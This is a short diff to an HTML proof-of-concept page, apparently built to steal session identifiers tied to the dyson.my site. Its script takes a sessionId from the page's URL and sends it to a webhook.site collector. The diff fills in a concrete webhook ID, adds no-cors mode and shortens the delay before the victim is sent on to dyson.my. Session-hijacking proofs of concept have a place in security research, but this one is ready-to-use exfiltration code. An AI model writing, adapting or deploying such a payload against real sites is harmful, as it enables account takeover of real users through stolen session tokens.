--- a/final-poc.html
+++ b/final-poc.html
@@ -6,11 +6,13 @@
       const params = new URLSearchParams(window.location.search);
       const sessionId = params.get("sessionId");
       if (sessionId) {
-        fetch("https://webhook.site/your-id?leaked=" + sessionId); // Replace with actual Webhook ID
+        fetch("https://webhook.site/a2cf25f1-cb51-4ea9-9510-e885e4495fdc?leaked=" + encodeURIComponent(sessionId), {
+          mode: "no-cors"
+        });
       }
       setTimeout(() => {
         window.location.href = "https://www.dyson.my";
-      }, 1000);
+      }, 500);
     </script>
   </head>
   <body>
